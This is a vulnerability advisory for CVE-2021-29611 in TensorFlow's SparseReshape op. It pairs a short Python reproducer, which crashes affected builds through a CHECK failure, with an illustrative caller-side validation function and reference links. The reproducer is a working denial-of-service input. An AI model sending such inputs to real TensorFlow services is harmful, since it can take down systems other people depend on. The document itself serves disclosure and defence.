CVE-2021-29611: Incomplete validation in `SparseReshape`
Incomplete validation in `SparseReshape` results in a denial of service based on a `CHECK`-failure.
```python
import tensorflow as tf

# Reproducer: on affected builds this call aborts the process with a CHECK failure.
input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64)
input_shape = tf.zeros([11], dtype=tf.int64)
new_shape = tf.zeros([1], dtype=tf.int64)

tf.raw_ops.SparseReshape(input_indices=input_indices,
                         input_shape=input_shape,
                         new_shape=new_shape)
```
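A caller-side guard for services that hand untrusted tensors to this op, added here as an example (it is not TensorFlow's code and not the upstream fix): it checks, in plain Python, the sparse-tensor invariants that the reproducer violates. The function name `check_sparse_reshape_args` and the choice of checks are assumptions of this example.

```python
from math import prod

def check_sparse_reshape_args(indices, input_shape, new_shape):
    """Return a list of problems; an empty list means the arguments are consistent.

    indices: N rows, one coordinate per dimension; input_shape/new_shape: flat int lists.
    The set of checks is this example's assumption, not the upstream patch.
    """
    problems = []
    rank = len(input_shape)
    if any(d < 0 for d in input_shape):
        problems.append("input_shape has a negative dimension")
    for i, row in enumerate(indices):
        # Every index row needs exactly one coordinate per input dimension.
        if len(row) != rank:
            problems.append(f"indices[{i}] has {len(row)} coordinates, "
                            f"input_shape has rank {rank}")
        elif any(not 0 <= c < d for c, d in zip(row, input_shape)):
            problems.append(f"indices[{i}] lies outside input_shape")
    # new_shape may hold one -1 wildcard; all other entries must be >= 0.
    wildcards = sum(1 for d in new_shape if d == -1)
    if wildcards > 1 or any(d < -1 for d in new_shape):
        problems.append("new_shape: at most one -1, no other negative entry")
        return problems
    dense = prod(input_shape)
    known = prod(d for d in new_shape if d != -1)
    if wildcards == 0 and known != dense:
        problems.append(f"new_shape holds {known} elements, input holds {dense}")
    elif wildcards == 1 and (known == 0 or dense % known != 0):
        problems.append("the -1 in new_shape cannot be inferred")
    return problems

# Values from the reproducer above, written as plain lists.
REPRO = dict(indices=[[41]], input_shape=[0] * 11, new_shape=[0])

if __name__ == "__main__":
    for p in check_sparse_reshape_args(**REPRO):
        print("rejected:", p)
```

Calling the guard before `tf.raw_ops.SparseReshape` turns a malformed request into an ordinary rejected input instead of a process abort.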
References
- github.com/advisories/GHSA-9rpc-5v9q-5r7f
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-539.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-737.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-248.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6
- github.com/tensorflow/tensorflow/security/advisories/GHSA-9rpc-5v9q-5r7f
- nvd.nist.gov/vuln/detail/CVE-2021-29611